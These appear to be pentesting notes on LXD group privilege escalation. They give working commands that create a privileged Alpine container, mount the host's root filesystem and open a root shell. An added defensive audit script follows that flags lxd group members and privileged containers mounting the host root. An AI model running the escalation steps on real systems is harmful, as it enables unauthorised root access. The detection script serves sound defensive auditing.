LXD - Alpine

Assuming you are already inside, for example as a low-privileged SSH user, check the user's groups:

id

.....(lxd)

Try the following:

[1] lxd init

[2] Build the exploit from Kali

Clone the builder and run it:

sudo git clone https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

sudo ./build-alpine

After building you are left with a tar file

Transfer the .tar file to /tmp/target using a Python server and either curl or wget

[3] Once the tar file is in the /tmp directory on the target:

lxd init

Press Enter a bunch of times until you get to the bottom. There is no need to change any configs; just accept the defaults.

lxc image import alpine.tar.gz --alias alpine

lxc init alpine privesc -c security.privileged=true

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

lxc start privesc

lxc exec privesc /bin/sh

#root
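
The steps above depend on two conditions a defender can audit for: a non-root account in the lxd group, and an instance that is both privileged and has a disk device sourced from the host's /. The following check is an added example, not part of the original notes; the function names and the sample group and config data are constructed, and the config format assumed is the YAML printed by `lxc config show <name> --expanded`.

```shell
#!/bin/sh
# Defensive audit helpers (added example; names and sample data are constructed).

# Read group(5) lines on stdin; print non-root members of the lxd group.
# Accounts whose primary GID is lxd are recorded in passwd and not covered here.
lxd_group_members() {
    awk -F: '$1 == "lxd" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "" && m[i] != "root") print m[i]
    }'
}

# Read `lxc config show <name> --expanded` YAML on stdin.
# Returns 0 if the instance is privileged AND has a disk device whose source is "/".
is_host_root_privileged() {
    awk '
        /^[^ ]/ { section = $1 }
        section == "config:" && $1 == "security.privileged:" {
            v = $2; gsub(/"/, "", v); if (v == "true") priv = 1
        }
        section == "devices:" && /^  [^ ]/ { src = ""; type = "" }
        section == "devices:" && $1 == "source:" { src = $2; gsub(/"/, "", src) }
        section == "devices:" && $1 == "type:" { type = $2 }
        section == "devices:" && src == "/" && type == "disk" { rootdisk = 1 }
        END { exit !(priv && rootdisk) }
    '
}

# Constructed sample inputs so the script runs offline.
sample_group() { printf '%s\n' 'root:x:0:' 'lxd:x:108:root,alice,bob' 'sudo:x:27:alice'; }
sample_config() {
    cat <<'EOF'
architecture: x86_64
config:
  security.privileged: "true"
devices:
  host-root:
    path: /mnt/root
    recursive: "true"
    source: /
    type: disk
ephemeral: false
EOF
}

echo "non-root lxd group members (sample):"
sample_group | lxd_group_members
if sample_config | is_host_root_privileged; then echo "ALERT: privileged instance mounts host /"; fi
```

On a real host, feed the functions `getent group` output and the config of each instance from `lxc list`. Membership in the lxd group is equivalent to root on the host, so remove any account that does not need to administer containers.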
